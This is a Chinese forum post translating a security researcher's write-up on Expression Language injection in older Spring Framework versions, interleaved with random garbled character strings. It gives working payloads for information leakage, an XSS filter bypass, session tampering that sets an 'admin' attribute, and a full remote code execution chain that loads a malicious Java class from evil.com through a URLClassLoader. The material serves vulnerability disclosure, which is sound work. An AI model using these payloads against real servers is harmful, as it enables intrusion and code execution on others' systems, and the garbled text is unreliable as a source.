Remote Code with4 x/ K$ q7 E3 b0 z8 N
Expression Language Injection
# L; ?. b6 f1 i4 |. kSpring Framework脆弱性—DanAmodio
0 f# Y5 G5 C6 t+ S全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
0 M2 o+ h% `! ]可能会存在风险。
3 w# k) R7 U6 o" Y& @ w在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
6 q, l3 |; Y7 l5 U: ~Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可" m6 ?6 R+ }' ~2 `$ f% j% _
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,+ t) _5 p6 x: H- B+ Z5 ~/ y) J% P
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前 _. n4 F2 z" o1 B( _+ t+ F/ H, F, h
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。$ m4 n7 c* |' Q3 Z( _
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但, s3 J, P6 U$ q) _
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版, O2 t% J2 [" j, l( E' o
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。- R- G5 W8 \( P
这些版本不支持禁用double EL resolution.' X! h5 A2 a9 i8 w H3 V
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含- Y7 w4 i; B b1 O( R
EL2.2容器上可能进行远程代码执行。6 o3 f" y2 A k: S9 P
这是一个原始信息泄露的攻击例子:
. _- D) |) f) g请求:1 j+ a8 J$ Z1 \+ l2 [! a
ttp://vulnerable.com/foo?message=${applicationScope}
/ K) P4 Q) n: [4 |到达以下内容页面:
% R" e$ C% Z+ G* F/ W" {3 {结果将输出一些包含内部服务器信息calsspath 和本地工作目录. p2 W4 q. |8 T
你也可以做一些其他事情,如这样:9 C5 B5 [ |" P
${9999+1}
4 z8 m% T7 J4 v8 W还可以访问session 对象和beans6 L* \6 P5 a& B( k Q9 v- p
${employee.lastName}0 o4 W, g. L- T) x# J& c- s) \3 p* N
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
+ F6 `; o0 R0 Y; a" d) C1 rEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东# Y; g# \& A3 _* N( ^
西,比如XSS.
, o6 T7 O6 x+ P2 ~9 C哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签/ |& a; n L2 s
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤3 ?3 X. K2 P; w9 C" X
呢?”
" L( ?# _0 y, c; ~! l因此,我尝试巳缦拢�
. }/ A! S, @; @. zhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
9 _# [" Q1 j8 A4 HP
' y# n& l& a* R5 s9 D# R6 ~我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返+ f: A, M* M4 e+ l
回的文本被插入进了spring:message 标签。
" [2 t2 T4 b8 s) ^$ A这里是一个最终绕过过滤的实例:+ J! D+ H+ Q3 u; k1 Y t
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ. r, I( W6 V0 G. U1 B2 R1 z* o
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
' N+ \' I& F. v什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?5 e$ j) r2 N3 f* c# f3 p0 n
经过一番研究,我学习到EL2.2 增加了方法调用。
$ e e7 @$ Q) p1 N8 ?我写了一个快速测试应用程序代码并且检测一些功能
( S, N! t7 v" w${pageContext.request.getSession().setAttribute(“account”,”123456″)}, M3 [0 {6 G/ c0 V' N k7 e
${pageContext.request.getSession().setAttribute(“admin”,true)}
" g* b" n6 o2 z* [" i+ d好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
- \: X7 G* y6 N, J# P1 a0 f, f$ ?指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
+ P, T) F+ d2 k1 R/ i/ c/ y+ ^) L${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1! H/ O. r' ~, A/ M3 w- \
“, 1234)}
1 ?. l9 a- y4 a: D: l${“”.getClass().forName(“java.lang.Runtime”)} d1 G7 w; }& [
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不8 N' p5 @. {5 o3 J4 w" a4 K
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函7 ?% Q6 G1 Y' X( J5 Z+ b7 `( ^- Z U7 S
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有1 i0 C' D" e! g, B
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
$ V9 k/ Y4 C0 M+ K方法签名invoke(Object obj, Object„ args) h& F1 ?+ a' `; _# [ L
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
# g9 g8 y. d; A, K R! E0 }7 {题,以让它可以工作起来。; Y+ Q. b: ^+ F+ W& p- L6 D
漏洞利用:1 u; G- H/ A- k9 Z- |' P. c& p
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
2 s1 `% t* @% {% Z- P# ]希望你们中的一些JAVA奇才告诉我我是如此的可笑。8 q" G0 F( X2 t$ E
这里有一些我试过的失败的用例,为了试图让它工作的用例:
9 z3 v* H: K% Z 写文件到文件系统/ p: P; {$ }6 L! P [7 C0 m- X
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
1 ^ ?6 t4 m( _3 l, t! Q我认为这些可以很好的工作,但是我不能找到合适的类来载入。# u' k, A9 C& x" M7 ?) }% R
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
$ K8 J% l2 C; i7 n2 L" J; ]& n' B1 Z! ajavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:' |' ^" G+ {3 N% D/ Y
org.springframework.expression.spel.standard.SpelExpressionParser not found$ q8 n, u: N: g! Y
by3 }: o- R- ~) r0 p; P8 `& l
org.glassfish.web.javax.servlet.jsp [194]., R; a0 z) L, E4 k8 h
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public; H) K: E6 }" m2 q, K
利用反射来创建一个新的Runtime(and watch the world burn)
2 w0 @2 C5 P; o5 P${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
: G8 c8 R, W% N$ ^5 k A# \/ B(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
* T! a1 q8 b( a3 o. V${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}9 c7 g+ f7 v% @" |
使用java.lang.ProcessBuilder
" X, ~* v/ n8 ?- \1 K" h 用表达式语言来评估表达式语言1 @; i. c- z# W( ?; h* `1 |; l" L' M
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.% X% I& G+ V- C) H
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request; A7 _8 T7 j: I4 B& G i0 C" O& u0 L4 Z
“,”".getClass(),null)}% T4 B2 z7 p+ e2 }, z a3 p- r# @3 O+ D
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)$ R0 @6 N9 [( H \: K
我在使用一个空数组通过Method.invoke()时失败了很多次5 K; m9 Q1 j4 R: S2 ~
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo: \# k% ~' R/ \" E; y
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A+ Y4 H2 U1 ?: y; d
rrayList”).newInstance().toArray()), k) _- U& W$ U1 P% t8 f5 K
java.lang.IllegalArgumentException: wrong number of arguments( j) F7 r; l, i! C* v3 J5 N/ x
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
: N( O! N% }: Y2 @以创建一个恶意class文件并且指向类装载器.
2 n; T/ |5 H5 F5 `) d: X我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:! S8 z4 ~+ {+ E; r5 Z" P
public class Malicious {
) N: R2 w' D4 a" ~; Y: Ipublic Malicious() {
) W) [) E' f. [7 Z5 @. ctry {7 G% _4 M% {( K! e" q; \
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
, z/ t) M" O3 h% f9 E" Vjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
* W0 b( u2 b- U: y2 x2 d} catch (Exception e) {
8 p9 o" h3 |* F0 D}
& b& c& w2 T* p% m0 J9 A: b, D. X ]}: V# M* a9 i6 f. n6 Q
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回/ f9 b% F* _, J6 T9 G l2 G
话中,因此它可以被使用." ?& d1 X" u: S6 C# Y; t) a( K
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName* Z1 [9 ]0 _& s G
(“java.util.ArrayList”).newInstance())}
& m. E4 \0 g, VURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建9 z; U9 ~% \2 L/ w4 R
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和( ]5 Q: M W/ o( ?+ e0 e
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个+ }* ^ q1 S# ^" n
我们可以调用的create(string)方法,然后转换对一个URL对象。
, E3 {0 y0 [; o, d/ e+ t8 ~${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh4 G* s s" M- V$ q6 `& G Q
ere/malicious/classfile/is/located/”).toURL())}
( Q0 r; A, F3 ^7 Q* T& \! l然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
( a6 j1 g& ^7 S. D' X" T恶意类文件被装载并创建,触发远程代码.
/ Z8 Q4 s7 C5 P! p' h) i${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte: T8 d2 H3 V4 b, S
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
; x! a: D& [; e" D( e! Y! fgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance8 U- u8 r! z' m& y
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对